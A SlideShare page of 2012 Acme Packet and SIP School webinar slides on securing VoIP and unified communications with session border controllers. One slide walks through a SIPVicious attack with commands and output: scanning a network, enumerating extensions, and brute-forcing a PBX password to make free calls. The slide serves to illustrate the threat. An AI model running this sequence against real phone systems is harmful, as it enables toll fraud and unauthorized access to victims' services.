SlideShare ist ein Scribd-Unternehmen logo

Securing UC Borders with Acme Packet

•
•
A
AcmePacket

Slides from webinar offered by Acme Packet and the SIP School on securing unified communications borders with Acme Packet. To watch recorded webinar or download slides, visit : http://tiny.cc/securingUC

TechnologieBusiness
1 von 42
February, 2012 Securing your Unified Communications Borders with Acme Packet - in association with The SIP School Patrick McNeil, CISSP Acme Packet Premium Services Graham Francis CEO The SIP School
The SIP School • Founded in April 2000 • 5500+ Students • Provide the Industry recognised SSCA® SIP Certification program, endorsed by the TIA + more. • eLearning in modular format • Unique as content evolves as SIP evolves • Connected with Acme Packet to provide SIP foundation training • http://www.thesipschool.com / Discount codes later. • Now let’s start by looking at the challenges in securing unified communications. 2
The Unified Communications security challenge Adopt enterprise-wide IP communications to improve collaboration and productivity... …. All without increasing your risk profile 3
Unified Communications services are a prominent target October 2010 - SIPVicious port 5060 scans lead to €11 million loss March 2011 – Romania - Former employee held - Forged VoIP pins created May 2011 - Hudson County, New Jersey Man Pleads Guilty to $4.4 Million VoIP Fraud Scheme November 2011 - Philippine phone phreakers arrested after defrauding AT&T out of $2 Million to fund terrorists 4
UC services are an easy target • IP networks are inherently insecure – Developed without security in mind • Organizations rely on IP networks to conduct business – Multimodal communications difficult to control • Confidential information freely exchanged by users that don’t understand how it is transmitted 5
Cybercrime is organized • Knowledge, tools and techniques are shared openly • May have goals motivated by politics or profit • Commoditized sale of both the tools and results of the trade – Computing time on a botnet – “Fake” calling cards – Long distance calling with disposable phones – Number hijacking – Toll / international bypass 6
What are the threats?
How are UC services established? Items in red might reveal sensitive information INVITE sip:15559191212@serviceprovider.com SIP/2.0 Via: SIP/2.0/UDP 10.1.3.3:5060;branch=z9hG4bKb27061747269636b From: “JConnor“ <sip:15554141337@10.1.3.3:5060>;tag=18de4db33f To: "15559191212" <sip:15559191212@serviceprovider.com> Call-ID: 19424e0d9187654209ed34db33f CSeq: 1 INVITE Max-Forwards: 70 User-Agent: BigTelcoVendor/R16.4.1.1 SIP Supported: 100rel,timer,replaces,join,histinfo signaling Allow: INVITE,CANCEL,BYE,ACK,NOTIFY,REFER,OPTIONS,INFO,PUBLISH Contact: “JConnor" <sip:15554141337@10.1.3.3:5060;transport=udp> Content-Type: application/sdp Content-Length: 165 v=0 o=- 1 1 IN IP4 10.1.3.3 s=- c=IN IP4 10.1.3.3 SDP b=AS:64 t=0 0 Media m=audio 19001 RTP/AVP 0 127 description a=rtpmap:0 PCMU/8000 a=rtpmap:127 telephone-event/8000 8
How are your services targeted? Voice or video devices, chat, session recording, web integrated real-time communications applications Application CODECs (DSP) Presentation Session SIP, H323, MGCP, H248, TLS (signaling); RTP, RTCP (media) Session Delivery Targets TCP, UDP, SCTP Transport IPv4, IPv6, NAT, IPsec Network Data link technology that supports the transport of IP Data Link Physical Physical technology that supports the transport of data link frames The OSI Model Layers Exploits focused at the middle layers of the OSI model tend to get around traditional security implementations since the whole point is to allow services 9
The penetration campaign Reconnaissance Enumeration Attack Gaining Maintaining Covering access access tracks Port scanning Attack, gain and maintain access, Information gathering OS fingerprinting and cover tracks Service detection • Initial phases of an organized attack can easily go undetected • Stopping or making the early phases of an attack difficult can avoid service outage or fraud 10
What are the threats? Threat Potential Result Reconnaissance scan Preparation for targeted denial of service, fraud, or theft of service Session overloads Denial of service Protocol fuzzing Denial of service SPAM over Internet Targeted denial of service, fraud, breach of Telephony (SPIT) privacy Call Interception or Targeted denial of service, breach of Session Hijacking privacy, fraud, theft Eavesdropping Breach of privacy, fraud, theft Media injection Denial of service, fraud, theft 11
Which threats are seen the most? Overload Resource consumption Attackers Internal Availability disruption A A DoS/DDoS A Internet Unintentional Overload SIP Provider OR Internal Network 12
Which threats are seen the most? Theft of services / fraud Large phone bills Attackers Internal A Investigation costs A A Internet SIP Provider OR Internal Network Premium Rate Center 13
Which threats are seen the most? SPAM / SPIT Nuisance Attackers Internal A A Social Engineering A Internet SIP Provider OR Internal Network A A A Internal Threat 14
Not as much… “Man in the middle” Session-hijacking Attacker Internal Media injection A Remote Control Eavesdropping Internet SIP Provider OR Internal Network A Internal Threat 15
A simple example using SIPVicious I just went to your website and got the phone numbers for HR, Support, Investor Relations, etc., and they all seem to end with 1xxx… Scan the IP range registered to your company as reported by ARIN root@bt:/pentest/voip/sipvicious# ./svmap.py -p5060-5061 192.168.133.0/24 | SIP Device | User Agent | Fingerprint | -------------------------------------------------------------------------------- | 192.168.133.128:5060 | Asterisk PBX | Asterisk / SJphone/1.60.289a (SJ Labs) | Enumerate extensions … root@bt:/pentest/voip/sipvicious# ./svwar.py -e1000-9999 192.168.133.128 ------------------------------ | 1005 | reqauth | | 1004 | reqauth | | 1003 | reqauth | | 1002 | noauth | | 1001 | reqauth | We got one extension without a password! It must be misconfigured. Look for numeric passwords for another extension … root@bt:/pentest/voip/sipvicious# ./svcrack.py -u1001 -r1000-999999 192.168.133.128 | Extension | Password | ------------------------ Now just register a couple of soft phones and make free calls! | 1001 | 1234 | 16
BUT, wasn’t analog TDM safer? NO! We still saw: • Eavesdropping • Media injection • Caller impersonation • Toll fraud • Physical attacks 17
How does Acme Packet secure Unified Communications services?
Net-Net E-SBCs control and secure network borders Service Provider IP telephony Conferencing CRM Tele-presence Contact center Enterprise Easy Assured Strong security interoperability reliability • Network • SIP • Quality user border interoperability experience protection • Protocol • Resilient • Privacy interworking services 19
Net-SAFE™ Session-Aware Filtering & Enforcement • Hardware & Software DoS/DDoS prevention • Hardware-accelerated encryption & authentication • Dynamic and Static Access control lists • Protocol enforcement and interoperability • Topology hiding and NAT • Session overload protection (upstream/downstream) • Regulatory compliance / legal intercept to recorder • Fraud prevention / endpoint trust management • Routing, high availability and load balancing HW DoS policy SW DoS Routing / Session Management Destination + ACLs policy Availability Endpoint Trust Threshold Management Management Discard 20
confidentiality security Confidentiality integrity availability Ensure that information is not disclosed to unauthorized parties
Remove identifying data From: JConnor @ my desk To: Customer Obscure the internal structure of your network Via: My PBX Route: PBX, SBC and services so attackers don’t know what or Phone: Brand X Desk Phone, software version x.y.z.1 how to attack Send Audio: To my phone Vendor Specific: Location • Back to Back User Agent (B2BUA) - terminates and re-originates all sessions so we can manipulate them • Topology Hiding – modify or strip signaling message parts that might reveal your internal network or telephony topology From: CorpUser @ SBC To: Customer Via: SBC Route: SBC Send Audio: To SBC 22
Authorize and encrypt for privacy and control Enterprise Signaling or media traffic going across an untrusted network should be encrypted to avoid eavesdropping or hijacking, and assure message integrity A • Fast hardware-accelerated Private network Internet encryption • Encryption specified on Campus Branch boundary by boundary basis Legitimate session TLS-encrypted session • Can ensure non-repudiation Sniffing 23
confidentiality security Integrity integrity availability Data and systems are not modified or used maliciously or accidentally
Assure message integrity Verify the integrity of signaling and media that UAS/UAC Session enters your network to prevent service disruption Control Function Routing Protocol • Attacks are dropped at the Manipulation network processor and won’t Policing Engine impact the CPU or memory Parser Host Based • Signaling is decomposed and Software analyzed for validity against RFC Traffic Manager requirements Classifier Media Control Network Function Signaling Encryption Network Processor Network Interface Embedded Software Media E-SBC 25
Prevent fraudulent calls Monitor violations of call thresholds to spot misbehaving hosts, and analyze call detail records to detect fraud patterns • Routing rules can refuse traffic to premium or fraudulent rate centers attacker • SNMP traps to management station indicate potential abuse • Call Detail Record (CDR) feeds can be management station sent “off box” for analysis including metrics for call quality 26
confidentiality security Availability integrity availability Reliability and accessibility of data and resources to authorized individuals in a timely manner
Denial of Service (DoS) protection Assume hosts are untrusted until they verify their identity through authentication and/or other actions. Establish thresholds to protect against compromised or unintentionally misbehaving hosts • Initial trust level and message thresholds Trusted enforced • Depending on their actions, hosts will be promoted to trusted status or demoted to Untrusted untrusted or denied status • Queues based on trust level make sure services are available even while under Deny DoS attack Dynamic Trust Levels 28
Manage service capacities Understand the capacities of your services and limit access so they do not become overwhelmed • Thresholds per session agent Sessions = 500 – Sessions 50% Burst-rate = 10 cps Sustained = 8 cps – Burst rate Sessions = 300 – Sustained rate Burst-rate = 5 cps 30% – Status Sustained = 4 cps • Variable load balancing Sessions = 200 Burst-rate = 4 cps 20% Sustained = 3 cps 29
Make UC services resilient Implement hardware and/or site redundancy to minimize the impact of physical attacks to building, power, network, etc. High Availability Multi-site failover • No loss of active sessions • Multiple SIP trunks improve network • Active / Standby failover in 40ms resiliency in disaster recovery scenarios • Checkpointing configuration, media • SBC enables fast failover without & signaling state operator intervention • Preserves CDRs on failover X sessions 30
Security Architecture
Trust zones provide flexibility Use the SBC to create a virtual firewall DMZ architecture to create multiple zones with different trust levels Low Trust Routing Internet Core / SIP or H.323 I Backbone Sig n Sig SIP or H.323 media t media e Partner r High Trust SIP or H.323 Sig Sig w media o media r Sig k Sig Outsourcer I Internal media n media SIP or H.323 SIP or H.323 g Medium Trust Medium Trust 32
Security for SIP trunking applications SIP / MPLS Provider, Internet, or any Untrusted Network Run data firewalls and Acme Packet SBCs in parallel to manage data and communications services in the optimal location DMZ Acme Packet SBC HA Pair Data Network or UC Network or VLAN VLAN 33
Security for remote worker access Data centers Send remote users to the SBC instead of your VPN concentrator for message verification, throttling, and best performance without the VPN need for a VPN client TLS/SRTP to SBC vs VPN Tunnel • SIP message integrity verification • SBC can cache client registration, responding to regular client keep-alives • Confidentiality through signaling and Internet media encryption • Easier connectivity & traversal through local firewalls vs. VPN solutions - VPN especially while travelling Teleworker Teleworker 34
Common Questions
“Why do I need a SBC when the service provider has one?” • Integrity: The Service Provider SBC is there to protect themselves from Service Provider you • Availability: Routing to SIP gateways and service providers • Interop / Confidentiality: SIP normalization and topology hiding • Quality of Service: Call routing can Customer 1,2,3 …. be dynamically be driven by call quality 36
“What do I tell my security department?” • 1,525 customers in 107 countries– the industry standard • Processes calls through both general IP and UC specific attacks • Acme Packet Net-Net SBC certified by the U.S. DISA JITC at Ft. Huachuca, AZ for information assurance and interoperability in DoD networks • Can work in a firewall DMZ if best practices are followed 37
Summary
Don’t forget to think holistically… Physical security – locks, badges, lighting, emergency exits Data security - 802.1x, LLDP, firewalls, ACLs, VLAN strategy, internal encryption, administrative interfaces, QoS marking and measurement Host security - Anti-virus, control of third party apps and endpoints, patching and configuration of end devices, asset acquisition and disposal Disaster recovery – redundant hardware, services, network Compensating controls - CDR analysis to prevent or detect insider abuse, logging, video surveillance; internal scans or penetration testing Internal controls - hiring policies and security reviews Employee training programs – best practices guidelines and clear expectations; educate employees to recognize social engineering 39
Additional resources Acme Packet services, training, sales, or partners http://www.acmepacket.com/ The SIP School http://www.thesipschool.com/ Back | Track Linux VoIP wiki pages http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP Voice Over IP Security Alliance (VOIPSA) http://voipsa.org The SIP Forum http://www.sipforum.org/ Your service provider 40
Questions?
Thank you • sales@acmepacket.com • info@thesipschool.com • The SIP School Discount Code = APDC2204 • Link to webinar recording will be e-mailed to all registered participants 42

Empfohlen

Stanley Chia's presentation at eComm 2008
Stanley Chia's presentation at eComm 2008Stanley Chia's presentation at eComm 2008
Stanley Chia's presentation at eComm 2008eComm2008
 
Get Ready for the Next Generation Diameter Signaling Controller (DSC)
Get Ready for the Next Generation Diameter Signaling Controller (DSC)Get Ready for the Next Generation Diameter Signaling Controller (DSC)
Get Ready for the Next Generation Diameter Signaling Controller (DSC)Dialogic Inc.
 
4 g networks
4 g networks4 g networks
4 g networksIntissar Ahsissen
 
Bayside Case Study (Final January 2014)
Bayside Case Study (Final January 2014)Bayside Case Study (Final January 2014)
Bayside Case Study (Final January 2014)Nep Vijayaraja
 
VoIP: Consumer Market Trends
VoIP: Consumer Market TrendsVoIP: Consumer Market Trends
VoIP: Consumer Market TrendsAlex Gault
 
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​Mavenir: Monetizing RCS through Innovation on Cloud Native Network​
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​Mavenir
 
Mavenir: Rich Mobile Business Messaging
Mavenir: Rich Mobile Business MessagingMavenir: Rich Mobile Business Messaging
Mavenir: Rich Mobile Business MessagingMavenir
 
How do the 802.11u and HotSpot 2.0 work?
How do the 802.11u and HotSpot 2.0 work?How do the 802.11u and HotSpot 2.0 work?
How do the 802.11u and HotSpot 2.0 work?Michal Jarski
 

Empfohlen

Stanley Chia's presentation at eComm 2008
Stanley Chia's presentation at eComm 2008Stanley Chia's presentation at eComm 2008
Stanley Chia's presentation at eComm 2008eComm2008
 
Get Ready for the Next Generation Diameter Signaling Controller (DSC)
Get Ready for the Next Generation Diameter Signaling Controller (DSC)Get Ready for the Next Generation Diameter Signaling Controller (DSC)
Get Ready for the Next Generation Diameter Signaling Controller (DSC)Dialogic Inc.
 
4 g networks
4 g networks4 g networks
4 g networksIntissar Ahsissen
 
Bayside Case Study (Final January 2014)
Bayside Case Study (Final January 2014)Bayside Case Study (Final January 2014)
Bayside Case Study (Final January 2014)Nep Vijayaraja
 
VoIP: Consumer Market Trends
VoIP: Consumer Market TrendsVoIP: Consumer Market Trends
VoIP: Consumer Market TrendsAlex Gault
 
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​Mavenir: Monetizing RCS through Innovation on Cloud Native Network​
Mavenir: Monetizing RCS through Innovation on Cloud Native Network​Mavenir
 
Mavenir: Rich Mobile Business Messaging
Mavenir: Rich Mobile Business MessagingMavenir: Rich Mobile Business Messaging
Mavenir: Rich Mobile Business MessagingMavenir
 
How do the 802.11u and HotSpot 2.0 work?
How do the 802.11u and HotSpot 2.0 work?How do the 802.11u and HotSpot 2.0 work?
How do the 802.11u and HotSpot 2.0 work?Michal Jarski
 
Introduction to Telco-OTT Services
Introduction to Telco-OTT ServicesIntroduction to Telco-OTT Services
Introduction to Telco-OTT ServicesMartin Geddes
 
SmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast ShootoutSmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast ShootoutDavid Chambers
 
4G
4G4G
4GSomesh Ransubhe
 
What WiFi Offload Don't Reveal
What WiFi Offload Don't RevealWhat WiFi Offload Don't Reveal
What WiFi Offload Don't RevealGreen Packet
 
MWC 2010 DPI
MWC 2010 DPIMWC 2010 DPI
MWC 2010 DPIContinuous Computing
 
Cellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology ResearchCellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology ResearchAndy Odgers
 
IMS World Forum 2013 Highlights
IMS World Forum 2013 HighlightsIMS World Forum 2013 Highlights
IMS World Forum 2013 HighlightsAlan Quayle
 
InnerWireless Distributed Antenna Brochure
InnerWireless Distributed Antenna BrochureInnerWireless Distributed Antenna Brochure
InnerWireless Distributed Antenna BrochureInnerWireless/Black Box Network Services
 
Evolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the EnterpriseEvolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the EnterpriseAndy Odgers
 
Tcl telecom expertise v 2 00 vs 220812
Tcl telecom expertise v 2 00 vs 220812Tcl telecom expertise v 2 00 vs 220812
Tcl telecom expertise v 2 00 vs 220812Transition Consulting Limited, India
 
Juniper sa-sslvpn
Juniper sa-sslvpnJuniper sa-sslvpn
Juniper sa-sslvpnn|u - The Open Security Community
 
Mobile Scoping 05-13-11
Mobile Scoping 05-13-11Mobile Scoping 05-13-11
Mobile Scoping 05-13-11Christine Nolan
 
Dmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility ppDmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility ppjakreile
 
Private LTE - White Paper
Private LTE - White PaperPrivate LTE - White Paper
Private LTE - White PaperST Engineering iDirect
 
Cowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom ConferenceCowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom Conferenceinvestormavenirsystems
 
InAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentialsInAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentialsgenycaloisi
 
Securing 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and VirtualizationSecuring 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and VirtualizationDr. Edwin Hernandez
 
Bos365 April 2015
Bos365 April 2015Bos365 April 2015
Bos365 April 2015Michael Dixon
 
Spotlight On Enterprise SBCs
Spotlight On Enterprise SBCsSpotlight On Enterprise SBCs
Spotlight On Enterprise SBCsMithilesh Kumar - AWS, VCP,ITIL,SSCA
 
Audio codes presentation
Audio codes presentationAudio codes presentation
Audio codes presentationTed Wentzel
 
Session Delivery Networks for the Enterprise
Session Delivery Networks for the EnterpriseSession Delivery Networks for the Enterprise
Session Delivery Networks for the EnterpriseAcmePacket
 
Bridge communications presentation
Bridge communications presentationBridge communications presentation
Bridge communications presentationTed Wentzel
 

Weitere ähnliche Inhalte

Was ist angesagt?

Introduction to Telco-OTT Services
Introduction to Telco-OTT ServicesIntroduction to Telco-OTT Services
Introduction to Telco-OTT ServicesMartin Geddes
 
SmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast ShootoutSmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast ShootoutDavid Chambers
 
What WiFi Offload Don't Reveal
What WiFi Offload Don't RevealWhat WiFi Offload Don't Reveal
What WiFi Offload Don't RevealGreen Packet
 
Cellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology ResearchCellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology ResearchAndy Odgers
 
IMS World Forum 2013 Highlights
IMS World Forum 2013 HighlightsIMS World Forum 2013 Highlights
IMS World Forum 2013 HighlightsAlan Quayle
 
Evolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the EnterpriseEvolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the EnterpriseAndy Odgers
 
Mobile Scoping 05-13-11
Mobile Scoping 05-13-11Mobile Scoping 05-13-11
Mobile Scoping 05-13-11Christine Nolan
 
Dmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility ppDmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility ppjakreile
 
Cowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom ConferenceCowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom Conferenceinvestormavenirsystems
 
InAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentialsInAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentialsgenycaloisi
 
Securing 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and VirtualizationSecuring 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and VirtualizationDr. Edwin Hernandez
 

Was ist angesagt? (17)

Introduction to Telco-OTT Services
Introduction to Telco-OTT ServicesIntroduction to Telco-OTT Services
Introduction to Telco-OTT Services
 
SmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast ShootoutSmallCell Analyst Forecast Shootout
SmallCell Analyst Forecast Shootout
 
4G
4G4G
4G
 
What WiFi Offload Don't Reveal
What WiFi Offload Don't RevealWhat WiFi Offload Don't Reveal
What WiFi Offload Don't Reveal
 
MWC 2010 DPI
MWC 2010 DPIMWC 2010 DPI
MWC 2010 DPI
 
Cellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology ResearchCellular Core Enterprise White Paper by Rethink Technology Research
Cellular Core Enterprise White Paper by Rethink Technology Research
 
IMS World Forum 2013 Highlights
IMS World Forum 2013 HighlightsIMS World Forum 2013 Highlights
IMS World Forum 2013 Highlights
 
InnerWireless Distributed Antenna Brochure
InnerWireless Distributed Antenna BrochureInnerWireless Distributed Antenna Brochure
InnerWireless Distributed Antenna Brochure
 
Evolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the EnterpriseEvolving Architectures for Small Cells in the Enterprise
Evolving Architectures for Small Cells in the Enterprise
 
Tcl telecom expertise v 2 00 vs 220812
Tcl telecom expertise v 2 00 vs 220812Tcl telecom expertise v 2 00 vs 220812
Tcl telecom expertise v 2 00 vs 220812
 
Juniper sa-sslvpn
Juniper sa-sslvpnJuniper sa-sslvpn
Juniper sa-sslvpn
 
Mobile Scoping 05-13-11
Mobile Scoping 05-13-11Mobile Scoping 05-13-11
Mobile Scoping 05-13-11
 
Dmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility ppDmg tem2011-0718-05 madina--cto ns mobility pp
Dmg tem2011-0718-05 madina--cto ns mobility pp
 
Private LTE - White Paper
Private LTE - White PaperPrivate LTE - White Paper
Private LTE - White Paper
 
Cowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom ConferenceCowen and Company 42nd Annual Technology, Media, & Telecom Conference
Cowen and Company 42nd Annual Technology, Media, & Telecom Conference
 
InAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentialsInAVate_March13_IPTVEssentials
InAVate_March13_IPTVEssentials
 
Securing 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and VirtualizationSecuring 4G and LTE systems with Deep Learning and Virtualization
Securing 4G and LTE systems with Deep Learning and Virtualization
 

Andere mochten auch

Bos365 April 2015
Bos365 April 2015Bos365 April 2015
Bos365 April 2015Michael Dixon
 
Audio codes presentation
Audio codes presentationAudio codes presentation
Audio codes presentationTed Wentzel
 
Session Delivery Networks for the Enterprise
Session Delivery Networks for the EnterpriseSession Delivery Networks for the Enterprise
Session Delivery Networks for the EnterpriseAcmePacket
 
Bridge communications presentation
Bridge communications presentationBridge communications presentation
Bridge communications presentationTed Wentzel
 
Concurrency presentation
Concurrency presentationConcurrency presentation
Concurrency presentationTed Wentzel
 
Accelerate Microsoft Lync Deployments with Session Border Controllers
Accelerate Microsoft Lync Deployments with Session Border ControllersAccelerate Microsoft Lync Deployments with Session Border Controllers
Accelerate Microsoft Lync Deployments with Session Border ControllersAcmePacket
 
Unified Communications.com presentation
Unified Communications.com presentationUnified Communications.com presentation
Unified Communications.com presentationTed Wentzel
 
Audio codes one voice for lync
Audio codes one voice for lyncAudio codes one voice for lync
Audio codes one voice for lyncJohn D'Annunzio
 
One Voice For Hosted Services
One Voice For Hosted ServicesOne Voice For Hosted Services
One Voice For Hosted ServicesJohn D'Annunzio
 
Concurrency presentation
Concurrency presentationConcurrency presentation
Concurrency presentationTed Wentzel
 
Simplifying and enabling rcs service delivery
Simplifying and enabling rcs service deliverySimplifying and enabling rcs service delivery
Simplifying and enabling rcs service deliveryAcmePacket
 
Office 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison GuideOffice 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison GuideEric Lee
 
Unify Your Unified Communications Australia
Unify Your Unified Communications AustraliaUnify Your Unified Communications Australia
Unify Your Unified Communications AustraliaAcmePacket
 
Concurrency Security Summit presentation
Concurrency Security Summit presentationConcurrency Security Summit presentation
Concurrency Security Summit presentationTed Wentzel
 
What's up with SIP?
What's up with SIP?What's up with SIP?
What's up with SIP?Graham Francis
 
The AudioCodes SBC Family
The AudioCodes SBC FamilyThe AudioCodes SBC Family
The AudioCodes SBC FamilyWESTCON EMEA
 
SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2ekrapf
 
Ready for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirementsReady for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirementsAcmePacket
 
Cloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar SlidesCloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar SlidesArrow Systems Integration
 

Andere mochten auch (20)

Bos365 April 2015
Bos365 April 2015Bos365 April 2015
Bos365 April 2015
 
Spotlight On Enterprise SBCs
Spotlight On Enterprise SBCsSpotlight On Enterprise SBCs
Spotlight On Enterprise SBCs
 
Audio codes presentation
Audio codes presentationAudio codes presentation
Audio codes presentation
 
Session Delivery Networks for the Enterprise
Session Delivery Networks for the EnterpriseSession Delivery Networks for the Enterprise
Session Delivery Networks for the Enterprise
 
Bridge communications presentation
Bridge communications presentationBridge communications presentation
Bridge communications presentation
 
Concurrency presentation
Concurrency presentationConcurrency presentation
Concurrency presentation
 
Accelerate Microsoft Lync Deployments with Session Border Controllers
Accelerate Microsoft Lync Deployments with Session Border ControllersAccelerate Microsoft Lync Deployments with Session Border Controllers
Accelerate Microsoft Lync Deployments with Session Border Controllers
 
Unified Communications.com presentation
Unified Communications.com presentationUnified Communications.com presentation
Unified Communications.com presentation
 
Audio codes one voice for lync
Audio codes one voice for lyncAudio codes one voice for lync
Audio codes one voice for lync
 
One Voice For Hosted Services
One Voice For Hosted ServicesOne Voice For Hosted Services
One Voice For Hosted Services
 
Concurrency presentation
Concurrency presentationConcurrency presentation
Concurrency presentation
 
Simplifying and enabling rcs service delivery
Simplifying and enabling rcs service deliverySimplifying and enabling rcs service delivery
Simplifying and enabling rcs service delivery
 
Office 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison GuideOffice 365 PBX Replacement Comparison Guide
Office 365 PBX Replacement Comparison Guide
 
Unify Your Unified Communications Australia
Unify Your Unified Communications AustraliaUnify Your Unified Communications Australia
Unify Your Unified Communications Australia
 
Concurrency Security Summit presentation
Concurrency Security Summit presentationConcurrency Security Summit presentation
Concurrency Security Summit presentation
 
What's up with SIP?
What's up with SIP?What's up with SIP?
What's up with SIP?
 
The AudioCodes SBC Family
The AudioCodes SBC FamilyThe AudioCodes SBC Family
The AudioCodes SBC Family
 
SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2SIP Trunking Case Study (Medtronic) Part 2
SIP Trunking Case Study (Medtronic) Part 2
 
Ready for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirementsReady for the Evolution: LTE Session delivery requirements
Ready for the Evolution: LTE Session delivery requirements
 
Cloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar SlidesCloud PBX with Office 365 Webinar Slides
Cloud PBX with Office 365 Webinar Slides
 

Ähnlich wie Securing UC Borders with Acme Packet

S series presentation
S series presentationS series presentation
S series presentationSergey Marunich
 
F5's IP Intelligence Service
F5's IP Intelligence ServiceF5's IP Intelligence Service
F5's IP Intelligence ServiceF5 Networks
 
Analysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence ProcedureAnalysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence Procedureijsrd.com
 
Securing VoIP Networks
Securing VoIP NetworksSecuring VoIP Networks
Securing VoIP NetworksGENBANDcorporate
 
Protect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksProtect your IPPBX against VOIP attacks
Protect your IPPBX against VOIP attacksRohan Fernandes
 
Bapinger Network Security
Bapinger Network SecurityBapinger Network Security
Bapinger Network SecurityDjadja Sardjana
 
76 s201919
76 s20191976 s201919
76 s201919IJRAT
 
PCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaPCTY 2012, IBM Security and Strategy v. Fabio Panada
PCTY 2012, IBM Security and Strategy v. Fabio PanadaIBM Danmark
 
An approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxAn approach to mitigate DDoS attacks on SIP.pptx
An approach to mitigate DDoS attacks on SIP.pptxamalouwarda1
 
6 Steps to SIP trunking security
6 Steps to SIP trunking security6 Steps to SIP trunking security
6 Steps to SIP trunking securityFlowroute
 
Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Using Your Network as a Sensor for Enhanced Visibility and Security
Using Your Network as a Sensor for Enhanced Visibility and Security Lancope, Inc.
 
Modern Lessons in Security Monitoring
Modern Lessons in Security MonitoringModern Lessons in Security Monitoring
Modern Lessons in Security MonitoringAnton Goncharov
 
Information Security
Information SecurityInformation Security
Information SecurityMohit8780
 
Askozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia VoIP Security white paper - 2017, English
Askozia VoIP Security white paper - 2017, EnglishAskozia
 
Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Insider threats webinar 01.28.15
Insider threats webinar 01.28.15Lancope, Inc.
 
VoIP security
VoIP securityVoIP security
VoIP securityMile Blenton
 
Voippresentation
VoippresentationVoippresentation
Voippresentationeliran2
 
Securty Issues from 1999
Securty Issues from 1999Securty Issues from 1999
Securty Issues from 1999TomParker
 

Ähnlich wie Securing UC Borders with Acme Packet (20)

S series presentation
S series presentationS series presentation
S series presentation
 
F5's IP Intelligence Service
F5's IP Intelligence ServiceF5's IP Intelligence Service
F5's IP Intelligence Service
 
285 288
285 288285 288
285 288
 
285 288
285 288285 288
285 288
 
Analysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence ProcedureAnalysis of VoIP Forensics with Digital Evidence Procedure
Analysis of VoIP Forensics with Digital Evidence Procedure
 
Securing VoIP Networks
Securing VoIP NetworksSecuring VoIP Networks
Securing VoIP Networks
 
Protect your IPPBX against VOIP attacks
